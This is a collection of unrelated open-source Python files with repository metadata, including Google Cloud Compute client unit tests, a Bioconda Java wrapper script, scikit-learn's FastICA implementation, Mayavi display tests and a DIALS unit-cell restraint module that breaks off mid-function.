# A client may be instantiated with a custom transport instance.
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = MachineTypesClient(transport=transport)
assert client.transport is transport
@pytest.mark.parametrize("transport_class", [transports.MachineTypesRestTransport,])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_machine_types_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.MachineTypesTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_machine_types_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.compute_v1.services.machine_types.transports.MachineTypesTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.MachineTypesTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"aggregated_list",
"get",
"list",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
def test_machine_types_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.compute_v1.services.machine_types.transports.MachineTypesTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.MachineTypesTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/compute.readonly",
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id="octopus",
)
def test_machine_types_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
"google.cloud.compute_v1.services.machine_types.transports.MachineTypesTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.MachineTypesTransport()
adc.assert_called_once()
def test_machine_types_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
MachineTypesClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/compute.readonly",
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id=None,
)
def test_machine_types_http_transport_client_cert_source_for_mtls():
cred = ga_credentials.AnonymousCredentials()
with mock.patch(
"google.auth.transport.requests.AuthorizedSession.configure_mtls_channel"
) as mock_configure_mtls_channel:
transports.MachineTypesRestTransport(
credentials=cred, client_cert_source_for_mtls=client_cert_source_callback
)
mock_configure_mtls_channel.assert_called_once_with(client_cert_source_callback)
@pytest.mark.parametrize("transport_name", ["rest",])
def test_machine_types_host_no_port(transport_name):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="compute.googleapis.com"
),
transport=transport_name,
)
assert client.transport._host == (
"compute.googleapis.com:443"
if transport_name in ["grpc", "grpc_asyncio"]
else "https://compute.googleapis.com"
)
@pytest.mark.parametrize("transport_name", ["rest",])
def test_machine_types_host_with_port(transport_name):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="compute.googleapis.com:8000"
),
transport=transport_name,
)
assert client.transport._host == (
"compute.googleapis.com:8000"
if transport_name in ["grpc", "grpc_asyncio"]
else "https://compute.googleapis.com:8000"
)
def test_common_billing_account_path():
billing_account = "squid"
expected = "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
actual = MachineTypesClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "clam",
}
path = MachineTypesClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = MachineTypesClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "whelk"
expected = "folders/{folder}".format(folder=folder,)
actual = MachineTypesClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "octopus",
}
path = MachineTypesClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = MachineTypesClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "oyster"
expected = "organizations/{organization}".format(organization=organization,)
actual = MachineTypesClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "nudibranch",
}
path = MachineTypesClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = MachineTypesClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "cuttlefish"
expected = "projects/{project}".format(project=project,)
actual = MachineTypesClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "mussel",
}
path = MachineTypesClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = MachineTypesClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "winkle"
location = "nautilus"
expected = "projects/{project}/locations/{location}".format(
project=project, location=location,
)
actual = MachineTypesClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "scallop",
"location": "abalone",
}
path = MachineTypesClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = MachineTypesClient.parse_common_location_path(path)
assert expected == actual
def test_client_with_default_client_info():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(
transports.MachineTypesTransport, "_prep_wrapped_messages"
) as prep:
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(
transports.MachineTypesTransport, "_prep_wrapped_messages"
) as prep:
transport_class = MachineTypesClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
def test_transport_close():
transports = {
"rest": "_session",
}
for transport, close_name in transports.items():
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
with mock.patch.object(
type(getattr(client.transport, close_name)), "close"
) as close:
with client:
close.assert_not_called()
close.assert_called_once()
def test_client_ctx():
transports = [
"rest",
]
for transport in transports:
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
# Test client calls underlying transport.
with mock.patch.object(type(client.transport), "close") as close:
close.assert_not_called()
with client:
pass
close.assert_called()
@pytest.mark.parametrize(
"client_class,transport_class",
[(MachineTypesClient, transports.MachineTypesRestTransport),],
)
def test_api_key_credentials(client_class, transport_class):
with mock.patch.object(
google.auth._default, "get_api_key_credentials", create=True
) as get_api_key_credentials:
mock_cred = mock.Mock()
get_api_key_credentials.return_value = mock_cred
options = client_options.ClientOptions()
options.api_key = "api_key"
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=mock_cred,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
|
googleapis/python-compute
|
tests/unit/gapic/compute_v1/test_machine_types.py
|
Python
|
apache-2.0
| 67,348
|
[
"Octopus"
] |
b1dd81bcfe781e1e4a2caf391fff3d4e0773a7c4fcd255fad306a982d34cb9a2
|
#!/usr/bin/env python
#
# Wrapper script for invoking the jar.
#
# This script is written for use with the Conda package manager and is ported
# from a bash script that does the same thing, adapting the style in
# the peptide-shaker wrapper
# (https://github.com/bioconda/bioconda-recipes/blob/master/recipes/peptide-shaker/peptide-shaker.py)
import subprocess
import sys
from os import access, getenv, path, X_OK
# Expected name of the VarScan JAR file.
JAR_NAME = 'cromwell.jar'
# Default options passed to the `java` executable.
DEFAULT_JVM_MEM_OPTS = ['-Xms512m', '-Xmx1g']
def real_dirname(in_path):
"""Returns the symlink-resolved, canonicalized directory-portion of
the given path."""
return path.dirname(path.realpath(in_path))
def java_executable():
"""Returns the name of the Java executable."""
java_home = getenv('JAVA_HOME')
java_bin = path.join('bin', 'java')
if java_home and access(path.join(java_home, java_bin), X_OK):
return path.join(java_home, java_bin)
return 'java'
def jvm_opts(argv, default_mem_opts=DEFAULT_JVM_MEM_OPTS):
"""Constructs a list of Java arguments based on our argument list.
The argument list passed in argv must not include the script name.
The return value is a 3-tuple lists of strings of the form:
(memory_options, prop_options, passthrough_options)
"""
mem_opts, prop_opts, pass_args = [], [], []
for arg in argv:
if arg.startswith('-D') or arg.startswith('-XX'):
opts_list = prop_opts
elif arg.startswith('-Xm'):
opts_list = mem_opts
else:
opts_list = pass_args
opts_list.append(arg)
if mem_opts == [] and getenv('_JAVA_OPTIONS') is None:
mem_opts = default_mem_opts
return (mem_opts, prop_opts, pass_args)
def main():
java = java_executable()
jar_dir = real_dirname(sys.argv[0])
(mem_opts, prop_opts, pass_args) = jvm_opts(sys.argv[1:])
if pass_args != [] and pass_args[0].startswith('org'):
jar_arg = '-cp'
else:
jar_arg = '-jar'
jar_path = path.join(jar_dir, JAR_NAME)
java_args = [java] + mem_opts + prop_opts + [jar_arg] + [jar_path] + pass_args
sys.exit(subprocess.call(java_args))
if __name__ == "__main__":
main()
|
ThomasWollmann/bioconda-recipes
|
recipes/cromwell/cromwell.py
|
Python
|
mit
| 2,298
|
[
"Bioconda"
] |
9f11e14a9c79ba170939e74cf5d0927a0609bcb62f285c7ddd919397dd5c240e
|
"""
Python implementation of the fast ICA algorithms.
Reference: Tables 8.3 and 8.4 page 196 in the book:
Independent Component Analysis, by Hyvarinen et al.
"""
# Author: Pierre Lafaye de Micheaux, Stefan van der Walt, Gael Varoquaux,
# Bertrand Thirion, Alexandre Gramfort
# License: BSD 3 clause
import warnings
import numpy as np
from scipy import linalg
from ..base import BaseEstimator, TransformerMixin
from ..utils import array2d, as_float_array, check_random_state
__all__ = ['fastica', 'FastICA']
def _gs_decorrelation(w, W, j):
"""
Orthonormalize w wrt the first j rows of W
Parameters
----------
w: array of shape(n), to be orthogonalized
W: array of shape(p, n), null space definition
j: int < p
caveats
-------
assumes that W is orthogonal
w changed in place
"""
w -= np.dot(np.dot(w, W[:j].T), W[:j])
return w
def _sym_decorrelation(W):
""" Symmetric decorrelation
i.e. W <- (W * W.T) ^{-1/2} * W
"""
K = np.dot(W, W.T)
s, u = linalg.eigh(K)
# u (resp. s) contains the eigenvectors (resp. square roots of
# the eigenvalues) of W * W.T
W = np.dot(np.dot(np.dot(u, np.diag(1.0 / np.sqrt(s))), u.T), W)
return W
def _ica_def(X, tol, g, gprime, fun_args, max_iter, w_init):
"""Deflationary FastICA using fun approx to neg-entropy function
Used internally by FastICA.
"""
n_components = w_init.shape[0]
W = np.zeros((n_components, n_components), dtype=float)
# j is the index of the extracted component
for j in range(n_components):
w = w_init[j, :].copy()
w /= np.sqrt((w ** 2).sum())
n_iterations = 0
# we set lim to tol+1 to be sure to enter at least once in next while
lim = tol + 1
while ((lim > tol) & (n_iterations < (max_iter - 1))):
wtx = np.dot(w.T, X)
nonlin = g(wtx, fun_args)
if isinstance(nonlin, tuple):
gwtx, g_wtx = nonlin
else:
if not callable(gprime):
raise ValueError('The function supplied does not return a '
'tuple. Therefore fun_prime has to be a '
'function, not %s' % str(type(gprime)))
warnings.warn("Passing g and gprime separately is deprecated "
"and will be removed in 0.14.",
DeprecationWarning, stacklevel=2)
gwtx = nonlin
g_wtx = gprime(wtx, fun_args)
w1 = (X * gwtx).mean(axis=1) - g_wtx.mean() * w
_gs_decorrelation(w1, W, j)
w1 /= np.sqrt((w1 ** 2).sum())
lim = np.abs(np.abs((w1 * w).sum()) - 1)
w = w1
n_iterations = n_iterations + 1
W[j, :] = w
return W
def _ica_par(X, tol, g, gprime, fun_args, max_iter, w_init):
"""Parallel FastICA.
Used internally by FastICA --main loop
"""
n, p = X.shape
W = _sym_decorrelation(w_init)
# we set lim to tol+1 to be sure to enter at least once in next while
lim = tol + 1
it = 0
while ((lim > tol) and (it < (max_iter - 1))):
wtx = np.dot(W, X)
nonlin = g(wtx, fun_args)
if isinstance(nonlin, tuple):
gwtx, g_wtx = nonlin
else:
if not callable(gprime):
raise ValueError('The function supplied does not return a '
'tuple. Therefore fun_prime has to be a '
'function, not %s' % str(type(gprime)))
warnings.warn("Passing g and gprime separately is deprecated "
"and will be removed in 0.14.",
DeprecationWarning, stacklevel=2)
gwtx = nonlin
g_wtx = gprime(wtx, fun_args)
W1 = (np.dot(gwtx, X.T) / float(p)
- np.dot(np.diag(g_wtx.mean(axis=1)), W))
W1 = _sym_decorrelation(W1)
lim = max(abs(abs(np.diag(np.dot(W1, W.T))) - 1))
W = W1
it += 1
return W
def fastica(X, n_components=None, algorithm="parallel", whiten=True,
fun="logcosh", fun_prime='', fun_args={}, max_iter=200,
tol=1e-04, w_init=None, random_state=None):
"""Perform Fast Independent Component Analysis.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples is the number of samples and
n_features is the number of features.
n_components : int, optional
Number of components to extract. If None no dimension reduction
is performed.
algorithm : {'parallel', 'deflation'}, optional
Apply a parallel or deflational FASTICA algorithm.
whiten: boolean, optional
If True perform an initial whitening of the data.
If False, the data is assumed to have already been
preprocessed: it should be centered, normed and white.
Otherwise you will get incorrect results.
In this case the parameter n_components will be ignored.
fun : string or function, optional. Default: 'logcosh'
The functional form of the G function used in the
approximation to neg-entropy. Could be either 'logcosh', 'exp',
or 'cube'.
You can also provide your own function. It should return a tuple
containing the value of the function, and of its derivative, in the
point. Example:
def my_g(x):
return x ** 3, 3 * x ** 2
Supplying the derivative through the `fun_prime` attribute is
still supported, but deprecated.
fun_prime : empty string ('') or function, optional, deprecated.
See fun.
fun_args: dictionary, optional
Arguments to send to the functional form.
If empty and if fun='logcosh', fun_args will take value
{'alpha' : 1.0}
max_iter: int, optional
Maximum number of iterations to perform
tol: float, optional
A positive scalar giving the tolerance at which the
un-mixing matrix is considered to have converged
w_init: (n_components, n_components) array, optional
Initial un-mixing array of dimension (n.comp,n.comp).
If None (default) then an array of normal r.v.'s is used
source_only: boolean, optional
If True, only the sources matrix is returned.
random_state: int or RandomState
Pseudo number generator state used for random sampling.
Returns
-------
K: (n_components, p) array or None.
If whiten is 'True', K is the pre-whitening matrix that projects data
onto the first n.comp principal components. If whiten is 'False', K is
'None'.
W: (n_components, n_components) array
estimated un-mixing matrix
The mixing matrix can be obtained by::
w = np.dot(W, K.T)
A = w.T * (w * w.T).I
S: (n_components, n) array
estimated source matrix
Notes
-----
The data matrix X is considered to be a linear combination of
non-Gaussian (independent) components i.e. X = AS where columns of S
contain the independent components and A is a linear mixing
matrix. In short ICA attempts to `un-mix' the data by estimating an
un-mixing matrix W where ``S = W K X.``
This implementation was originally made for data of shape
[n_features, n_samples]. Now the input is transposed
before the algorithm is applied. This makes it slightly
faster for Fortran-ordered input.
Implemented using FastICA:
`A. Hyvarinen and E. Oja, Independent Component Analysis:
Algorithms and Applications, Neural Networks, 13(4-5), 2000,
pp. 411-430`
"""
random_state = check_random_state(random_state)
# make interface compatible with other decompositions
X = array2d(X).T
alpha = fun_args.get('alpha', 1.0)
if (alpha < 1) or (alpha > 2):
raise ValueError("alpha must be in [1,2]")
gprime = None
if isinstance(fun, str):
# Some standard nonlinear functions
# XXX: these should be optimized, as they can be a bottleneck.
if fun == 'logcosh':
def g(x, fun_args):
alpha = fun_args.get('alpha', 1.0) # comment it out?
gx = np.tanh(alpha * x)
g_x = alpha * (1 - gx ** 2)
return gx, g_x
elif fun == 'exp':
def g(x, fun_args):
exp = np.exp(-(x ** 2) / 2)
gx = x * exp
g_x = (1 - x ** 2) * exp
return gx, g_x
elif fun == 'cube':
def g(x, fun_args):
return x ** 3, 3 * x ** 2
else:
raise ValueError('fun argument should be one of logcosh, exp or'
' cube')
elif callable(fun):
def g(x, fun_args):
return fun(x, **fun_args)
if callable(fun_prime):
def gprime(x, fun_args):
return fun_prime(x, **fun_args)
else:
raise ValueError('fun argument should be either a string '
'(one of logcosh, exp or cube) or a function')
n, p = X.shape
if not whiten and n_components is not None:
n_components = None
warnings.warn('Ignoring n_components with whiten=False.')
if n_components is None:
n_components = min(n, p)
if (n_components > min(n, p)):
n_components = min(n, p)
print("n_components is too large: it will be set to %s" % n_components)
if whiten:
# Centering the columns (ie the variables)
X = X - X.mean(axis=-1)[:, np.newaxis]
# Whitening and preprocessing by PCA
u, d, _ = linalg.svd(X, full_matrices=False)
del _
K = (u / d).T[:n_components] # see (6.33) p.140
del u, d
X1 = np.dot(K, X)
# see (13.6) p.267 Here X1 is white and data
# in X has been projected onto a subspace by PCA
X1 *= np.sqrt(p)
else:
# X must be casted to floats to avoid typing issues with numpy
# 2.0 and the line below
X1 = as_float_array(X, copy=True)
if w_init is None:
w_init = random_state.normal(size=(n_components, n_components))
else:
w_init = np.asarray(w_init)
if w_init.shape != (n_components, n_components):
raise ValueError("w_init has invalid shape -- should be %(shape)s"
% {'shape': (n_components, n_components)})
kwargs = {'tol': tol,
'g': g,
'gprime': gprime,
'fun_args': fun_args,
'max_iter': max_iter,
'w_init': w_init}
if algorithm == 'parallel':
W = _ica_par(X1, **kwargs)
elif algorithm == 'deflation':
W = _ica_def(X1, **kwargs)
else:
raise ValueError('Invalid algorithm: must be either `parallel` or' +
' `deflation`.')
del X1
if whiten:
S = np.dot(np.dot(W, K), X)
return K, W, S.T
else:
S = np.dot(W, X)
return None, W, S.T
class FastICA(BaseEstimator, TransformerMixin):
"""FastICA; a fast algorithm for Independent Component Analysis
Parameters
----------
n_components : int, optional
Number of components to use. If none is passed, all are used.
algorithm : {'parallel', 'deflation'}
Apply parallel or deflational algorithm for FastICA
whiten : boolean, optional
If whiten is false, the data is already considered to be
whitened, and no whitening is performed.
fun : string or function, optional. Default: 'logcosh'
The functional form of the G function used in the
approximation to neg-entropy. Could be either 'logcosh', 'exp',
or 'cube'.
You can also provide your own function. It should return a tuple
containing the value of the function, and of its derivative, in the
point. Example:
def my_g(x):
return x ** 3, 3 * x ** 2
Supplying the derivative through the `fun_prime` attribute is
still supported, but deprecated.
fun_prime : empty string ('') or function, optional, deprecated.
See fun.
fun_args: dictionary, optional
Arguments to send to the functional form.
If empty and if fun='logcosh', fun_args will take value
{'alpha' : 1.0}
max_iter : int, optional
Maximum number of iterations during fit
tol : float, optional
Tolerance on update at each iteration
w_init : None of an (n_components, n_components) ndarray
The mixing matrix to be used to initialize the algorithm.
random_state: int or RandomState
Pseudo number generator state used for random sampling.
Attributes
----------
`components_` : 2D array, [n_components, n_features]
The unmixing matrix
`sources_`: 2D array, [n_samples, n_components]
The estimated latent sources of the data.
Notes
-----
Implementation based on
`A. Hyvarinen and E. Oja, Independent Component Analysis:
Algorithms and Applications, Neural Networks, 13(4-5), 2000,
pp. 411-430`
"""
def __init__(self, n_components=None, algorithm='parallel', whiten=True,
fun='logcosh', fun_prime='', fun_args=None, max_iter=200,
tol=1e-4, w_init=None, random_state=None):
super(FastICA, self).__init__()
self.n_components = n_components
self.algorithm = algorithm
self.whiten = whiten
self.fun = fun
self.fun_prime = fun_prime
self.fun_args = fun_args
self.max_iter = max_iter
self.tol = tol
self.w_init = w_init
self.random_state = random_state
def fit(self, X, y=None):
fun_args = {} if self.fun_args is None else self.fun_args
whitening_, unmixing_, sources_ = fastica(
X, self.n_components, self.algorithm, self.whiten, self.fun,
self.fun_prime, fun_args, self.max_iter, self.tol, self.w_init,
random_state=self.random_state)
if self.whiten:
self.components_ = np.dot(unmixing_, whitening_)
else:
self.components_ = unmixing_
self.sources_ = sources_
return self
def transform(self, X, y=None):
"""Apply un-mixing matrix "W" to X to recover the sources
S = X * W.T
"""
X = array2d(X)
return np.dot(X, self.components_.T)
def get_mixing_matrix(self):
"""Compute the mixing matrix
"""
return linalg.pinv(self.components_)
|
florian-f/sklearn
|
sklearn/decomposition/fastica_.py
|
Python
|
bsd-3-clause
| 14,739
|
[
"Gaussian"
] |
7c8bf18ca788e26c2eaf9fed9485bdf872d24cd7f5a48adce3e21c4212e29c23
|
import unittest
import numpy
from pyface.ui.qt4.util.modal_dialog_tester import ModalDialogTester
from traits.etsconfig.api import ETSConfig
from mayavi import mlab
from simphony_mayavi.show import show
from simphony.cuds.lattice import make_cubic_lattice
from simphony.cuds.mesh import Mesh, Point
from simphony.cuds.particles import Particles, Particle
def check_scene_opened_then_close(func):
''' Ensure that at the end of calling a function
any mayavi scene opened are closed '''
def new_func(test_case):
try:
func(test_case)
finally:
num_scenes = len(mlab.get_engine().scenes)
test_case.assertNotEqual(num_scenes, 0,
"No scene is opened")
# close everything
mlab.close(all=True)
return new_func
class TestShow(unittest.TestCase):
@unittest.skipIf(ETSConfig.toolkit != "qt4",
"this testcase requires backend == qt4")
@check_scene_opened_then_close
def test_lattice_show(self):
lattice = make_cubic_lattice(
'test', 0.2, (10, 10, 1), origin=(0.2, -2.4, 0.))
def function():
show(lattice)
return True
tester = ModalDialogTester(function)
tester.open_and_run(when_opened=lambda x: x.close(accept=False))
self.assertTrue(tester.result)
@unittest.skipIf(ETSConfig.toolkit != "qt4",
"this testcase requires backend == qt4")
@check_scene_opened_then_close
def test_mesh_show(self):
points = numpy.array([
[0, 0, 0], [1, 0, 0], [0, 1, 0], [0, 0, 1],
[2, 0, 0], [3, 0, 0], [3, 1, 0], [2, 1, 0],
[2, 0, 1], [3, 0, 1], [3, 1, 1], [2, 1, 1]],
'f')
mesh = Mesh('test')
point_iter = (Point(coordinates=point) for point in points)
mesh.add(point_iter)
def function():
show(mesh)
return True
tester = ModalDialogTester(function)
tester.open_and_run(when_opened=lambda x: x.close(accept=False))
self.assertTrue(tester.result)
@unittest.skipIf(ETSConfig.toolkit != "qt4",
"this testcase requires backend == qt4")
@check_scene_opened_then_close
def test_particles_show(self):
coordinates = numpy.array([
[0, 0, 0], [1, 0, 0], [0, 1, 0], [0, 0, 1],
[2, 0, 0], [3, 0, 0], [3, 1, 0], [2, 1, 0],
[2, 0, 1], [3, 0, 1], [3, 1, 1], [2, 1, 1]],
'f')
particles = Particles('test')
particle_iter = (Particle(coordinates=point+3)
for point in coordinates)
particles.add(particle_iter)
def function():
show(particles)
return True
tester = ModalDialogTester(function)
tester.open_and_run(when_opened=lambda x: x.close(accept=False))
self.assertTrue(tester.result)
def test_unknown_container(self):
container = object()
with self.assertRaises(TypeError):
show(container)
|
simphony/simphony-mayavi
|
simphony_mayavi/tests/test_show.py
|
Python
|
bsd-2-clause
| 3,093
|
[
"Mayavi"
] |
b2af45e85a557990064c170411d75f961c32b99ca5c35e71f615ba9d5db56be9
|
from __future__ import annotations
import logging
from math import pi
from scitbx import sparse
from scitbx.array_family import flex
from dials_refinement_helpers_ext import CalculateCellGradients
logger = logging.getLogger(__name__)
DEG2RAD = pi / 180.0
RAD2DEG = 180.0 / pi
class DerivedParameterTie:
"""Calculate the restraint and gradients for a single derived parameter
of the model"""
def __init__(self, target, weight):
self._target = target
self._w = weight
self._dRdp = None
def residual(self, parameter_value, parameter_gradients):
"""Calculate residual R, cache gradients"""
d = parameter_value - self._target
self._dRdp = parameter_gradients
return d
def gradient(self):
"""Return dR/dp"""
return self._dRdp
def weight(self):
"""Return restraint weight"""
return self._w
class SingleUnitCellTie:
"""Tie the parameters of a single unit cell model parameterisation to
target values via least-squares restraints. The restraints will be expressed
in terms of real space unit cell constants, whilst the underlying parameters
are encapsulated in the model parameterisation object"""
def __init__(self, model_parameterisation, target, sigma):
"""model_parameterisation is a CrystalUnitCellParameterisation
target is a sequence of 6 elements describing the target cell parameters
sigma is a sequence of 6 elements giving the 'sigma' for each of the
terms in target, from which weights for the residuals will be calculated.
Values of zero will remove the restraint for the cell parameter at
that position"""
self._xlucp = model_parameterisation
self._target = target
assert len(self._target) == 6
assert len(sigma) == 6
assert None not in sigma
# calculate gradients of cell parameters wrt model parameters.
grads = self._calculate_uc_gradients()
msg = (
"Unit cell similarity restraints were requested for both the "
"{0} and {1} dimensions, however for the crystal in experiment "
"{2} these are constrained to be equal. Only the strongest "
"of these restraints will be retained."
)
# identify cell dimensions constrained to be equal
a, b, c, aa, bb, cc = self._xlucp.get_model().get_unit_cell().parameters()
if abs(a - b) < 1e-10:
grad_diff = [abs(e1 - e2) for (e1, e2) in zip(grads[0], grads[1])]
if max(grad_diff) < 1e-10:
# a and b are equal, therefore keep only the strongest restraint
logger.debug(msg.format("a", "b", self._xlucp.get_experiment_ids()[0]))
strong, weak = sorted([sigma[0], sigma[1]])
if strong == 0.0:
strong = weak
sigma[0] = strong
sigma[1] = 0.0
if abs(a - c) < 1e-10:
grad_diff = [abs(e1 - e2) for (e1, e2) in zip(grads[0], grads[2])]
if max(grad_diff) < 1e-10:
# a and c are equal, therefore keep only the strongest restraint
logger.debug(msg.format("a", "c", self._xlucp.get_experiment_ids()[0]))
strong, weak = sorted([sigma[0], sigma[2]])
if strong == 0.0:
strong = weak
sigma[0] = strong
sigma[2] = 0.0
if abs(b - c) < 1e-10:
grad_diff = [abs(e1 - e2) for (e1, e2) in zip(grads[1], grads[2])]
if max(grad_diff) < 1e-10:
# b and c are equal, therefore keep only the strongest restraint
logger.debug(msg.format("b", "c", self._xlucp.get_experiment_ids()[0]))
strong, weak = sorted([sigma[1], sigma[2]])
if strong == 0.0:
strong = weak
sigma[1] = strong
sigma[2] = 0.0
# A gradient of zero indicates that cell parameter is constrained and thus
# to be ignored in restraints
msg = (
"Unit cell similarity restraints were requested for the {0} "
"parameter, however for the crystal in experiment {1}, {0} is "
"constrained. This restraint will be removed."
)
_sigma = []
for i, (sig, grad, pname) in enumerate(
zip(sigma, grads, ["a", "b", "c", "alpha", "beta", "gamma"])
):
tst = (abs(g) > 1.0e-10 for g in grad)
if any(tst):
if sig == 0.0:
sig = None
_sigma.append(sig)
else:
logger.debug(msg.format(pname, self._xlucp.get_experiment_ids()[0]))
_sigma.append(None)
# For each non-zero sigma create a restraint between the relevant cell
# parameter and its target value
self._ties = []
for t, s in zip(self._target, _sigma):
if s is not None:
self._ties.append(DerivedParameterTie(t, 1.0 / s**2))
else:
self._ties.append(None)
# set up empty weights list
self._weights = []
def _calculate_uc_gradients(self, sel=[True] * 6):
"""Calculate gradients of the unit cell parameters with respect to
each of the parameters of the crystal unit cell model parameterisation"""
B = self._xlucp.get_state()
dB_dp = flex.mat3_double(self._xlucp.get_ds_dp())
# Use C++ function for speed
ccg = CalculateCellGradients(B, dB_dp)
nparam = len(dB_dp)
da = list(ccg.da_dp()) if sel[0] else [0.0] * nparam
db = list(ccg.db_dp()) if sel[1] else [0.0] * nparam
dc = list(ccg.dc_dp()) if sel[2] else [0.0] * nparam
daa = list(ccg.daa_dp()) if sel[3] else [0.0] * nparam
dbb = list(ccg.dbb_dp()) if sel[4] else [0.0] * nparam
dcc = list(ccg.dcc_dp()) if sel[5] else [0.0] * nparam
return (da, db, dc, daa, dbb, dcc)
def residuals(self):
"""Calculate and return the residuals, cache gradients"""
cell_params = self._xlucp.get_model().get_unit_cell().parameters()
# gradients of the cell parameters wrt model parameters
grads = self._calculate_uc_gradients(sel=[t is not None for t in self._ties])
R = []
for p, g, t in zip(cell_params, grads, self._ties):
if t is None:
continue
R.append(t.residual(parameter_value=p, parameter_gradients=g))
return R
@property
def num_residuals(self):
"""Get the number of residuals"""
return len(self._ties) - self._ties.count(None)
def gradients(self):
"""For each residual, return the gradients dR/dp. Requires residuals to be
called first"""
dRdp = []
for t in self._ties:
if t is None:
continue
dRdp.append(t.gradient())
return dRdp
def weights(self):
"""Return the weights for the residuals vector"""
# the weights do not change so cache them
if not self._weights:
self._weights = []
for t in self._ties:
if t is None:
continue
self._weights.append(t.weight())
return self._weights
class MeanUnitCellTie:
"""Tie the parameters of multiple unit cell model parameterisations to
central values via least-squares restraints. The restraints will be expressed
in terms of real space unit cell constants, whilst the underlying parameters
are encapsulated in the model parameterisation objects"""
def __init__(self, model_parameterisations, sigma):
"""model_parameterisations is a list of CrystalUnitCellParameterisations
sigma is a sequence of 6 elements giving the 'sigma' for each of the
unit cell parameters, from which weights for the residuals will be
calculated. Values of zero in sigma will remove the restraint for the
cell parameter at that position"""
self._xlucp = model_parameterisations
self._nxls = len(model_parameterisations)
# common factors used in gradient calculations
self._meangradfac = 1.0 / self._nxls
self._gradfac = 1.0 - self._meangradfac
self._weights = []
# initially want to calculate all gradients
self._sel = [True] * 6
# identify any cell dimensions constrained to be equal. If any are and a
# restraint has been requested for that cell dimension, remove the restraint
# for all crystals and warn in the log
msg = (
"Unit cell similarity restraints were requested for both the "
"{0} and {1} dimensions, however for the crystal in experiment "
"{2} these are constrained to be equal. Only the strongest "
"of these restraints will be retained for all crystals in "
"the restrained group."
)
for ixl, xlucp in enumerate(self._xlucp):
B = xlucp.get_state()
dB_dp = flex.mat3_double(xlucp.get_ds_dp())
ccg = CalculateCellGradients(B, dB_dp)
grads = [
ccg.da_dp(),
ccg.db_dp(),
ccg.dc_dp(),
ccg.daa_dp(),
ccg.dbb_dp(),
ccg.dcc_dp(),
]
a, b, c, aa, bb, cc = xlucp.get_model().get_unit_cell().parameters()
if abs(a - b) < 1e-10:
grad_diff = [abs(e1 - e2) for (e1, e2) in zip(grads[0], grads[1])]
if max(grad_diff) < 1e-10:
# a and b are equal for this crystal, therefore keep only the
# strongest requested restraint
if sigma[0] > 0.0 and sigma[1] > 0.0:
logger.debug(
msg.format("a", "b", xlucp.get_experiment_ids()[0])
)
strong, weak = sorted([sigma[0], sigma[1]])
sigma[0] = strong
